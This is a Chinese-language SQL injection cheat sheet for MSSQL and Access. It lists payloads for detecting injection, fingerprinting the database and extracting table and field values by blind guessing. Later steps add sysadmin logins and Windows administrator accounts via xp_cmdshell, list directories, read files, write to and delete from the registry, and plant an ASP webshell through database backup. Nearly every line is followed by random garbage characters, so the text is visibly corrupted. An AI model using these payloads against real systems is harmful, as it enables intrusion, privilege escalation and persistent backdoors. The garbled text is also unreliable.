1.判断是否有注入;and 1=1 ;and 1=2 InTKd�r^ P
2.初步判断是否是mssql ;and user>0 sz)�{�u�OI
?yda.<"g9Y
3.注入参数是字符'and [查询条件] and ''=' �>!�CH7�wX
mOgx&ns;j�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 9L�UP{(uq�
+G>aj�'\M|
5.判断数据库系统 �v��#zf�s'
>�7�eu���'
;and (select count(*) from sysobjects)>0 mssql Y>��c5:�F;
�J�T}do�r
;and (select count(*) from msysobjects)>0 access h?M'�7Lt�i
:z�}~U3,JE
K��.c6Rg��
B]CS2LEq�h
6.猜数据库 ;and (select Count(*) from [数据库名])>0 o�%�QhV6(F
�,5%���aP%
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 G�N8`xR{J*
.�l"� �_�K
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �rQA�bN��6
M}�{n6�T6B
9.(1)猜字段的ascii值(access) 4?*�����`:
C:�TuC5S�r
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �jp\�J�wE�
��o�QKcGUZ
(2)猜字段的ascii值(mssql) 9e�|{z9z[l
�7��z�i^{]
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �~j�\���;e
��yS(=eB_
10.测试权限结构(mssql) 4
g/<).1<b
c>%z)�uY>/
NiU t����H
�/61�ag9pN
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- RJ7/I/yD|
rm�AP&Gw I
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ,L8I7O}A�;
cftn`:(&�8
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- F�einc�Z!M
�>�(YPkmH�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �g�@N=N��
<�'+R�%6��
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- fM
z�A�f3�
co(fGp#�!�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �r[��i~4N=
0�n��=9TmE
;and 1=(select IS_MEMBER('db_owner'));-- 8#d99d��Oe
r��A&#>R�`
n[S4180�9<
���^y�;OHo
11.添加mssql和系统的帐户 9X����*eE�
P"[l�8��6:
;exec master.dbo.sp_addlogin username;-- zrWq!F*-V\
;exec master.dbo.sp_password null,username,password;-- Uz�m[e�%/`
)x5$io
���
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- lFzQ�G:k�@
3IRR�FIiO�
;exec master.dbo.xp_cmdshell 'net user username password 8P'En+uE1|
[M zc�^I&�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ��vX!dMJa0
ML9T�(th6v
;exec master.dbo.xp_cmdshell 'net user username password /add';-- yQQDGFTb!=
{
�?�1�mY"
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- CgPZ��vB�[
�5i
wikC=y
-q����nX�a
�*X�=���f�
12.(1)遍历目录 \?�Oly�171
_t�R.RAaa"
;create table dirs(paths varchar(100), id int) ��4jZi6��2
\�!4ghev3�
;insert dirs exec master.dbo.xp_dirtree 'c:\' �?yd(er<_f
�|4 d{X@`&
;and (select top 1 paths from dirs)>0 ��Ozh^Q$>u
�bC,M�&�<N
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ��>?uH#%C5
uk>/I�l��
K:X�rfn{s�
�x4 A T�K�
(2)遍历目录 qS[p|�*BL�
�Qe=Q�8c�T
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �n3@g�{�4~
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 (��B~V�:Yt
�>t6'�8g"T
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 e&]`X H�C9
W:N"O\`{m
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 zI*/�u)48�
�K]=>�F��
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 w�W�)&Px
n
�&#EVE x�L
:Y)kKq�� d
=Q8^@i4[&D
13.mssql中的存储过程 �c�6}�xnH�
"T=�3mv%�S
xp_regenumvalues 注册表根键, 子键 �+#�*z"�a`
:J)l�C� =�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ,Elga}7u�
DF&jZ[##��
xp_regread 根键,子键,键值名 �K����L�v�
3B_} � :��
;exec xp_regread )��9sr,3�w
2|�_J��up�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 JNz"lTt>[g
eG�)/&zQ8
xp_regwrite 根键,子键, 值名, 值类型, 值 cB�"F1�~z�
NbK?Dg8WJG
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 cX]{RVZo-/
Q�)|LiCR,
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 GLcZ=6)"�'
�'9��F{.]
xp_regdeletevalue 根键,子键,值名 z E�7ocul
e �hB1`%�@
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 .$x[!fuuR&
<��OO/Tn'a
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
oG_'<5Bv>
$@�f3=NJ4k
rp[oH���=&
!J�Q�~r@�j
14.mssql的backup创建webshell ;<�GTtt#�D
_"t.1��+-K
use model �4R^j"x
5�
R*5;J`��TW
create table cmd(str image); m�
?tnk?oX
hF�PRC0ftE
insert into cmd(str) values (''); h.+&=s!Nsy
�)p_�LkX(�
backup database model to disk='c:\l.asp'; ^~Ic�Q!j/5
/gy:#-2Gy�
_!g��
�NF=
>w�m�$,%zk
15.mssql内置函数 u~�T$F/]k>
i3W��mD@�
;and (select @@version)>0 获得Windows的版本号 u2�\qg;d�P
=}�o�>�_+"
;and user_name()='dbo' 判断当前系统的连接用户是不是sa \� A UtG�P
c\�rbLr}l)
;and (select user_name())>0 爆当前系统的连接用户 3jd�B8a]T_
<cOE6;�d#
;and (select db_name())>0 得到当前连接的数据库 uV:uXQni``
Pds�*M?&F
4qXUk:C@m
8c�h~UB�q/
16.简洁的webshell 9��: |K]�y
$Y�Q&\[pDA
use model O]LuL&=s y
ZV^�J5w�YE
create table cmd(str image); �Fml��e��|
�M�if�gRUe
insert into cmd(str) values (''); HN�yDWD)�_
����c�]��0
backup database model to disk='g:\wwwtest\l.asp';
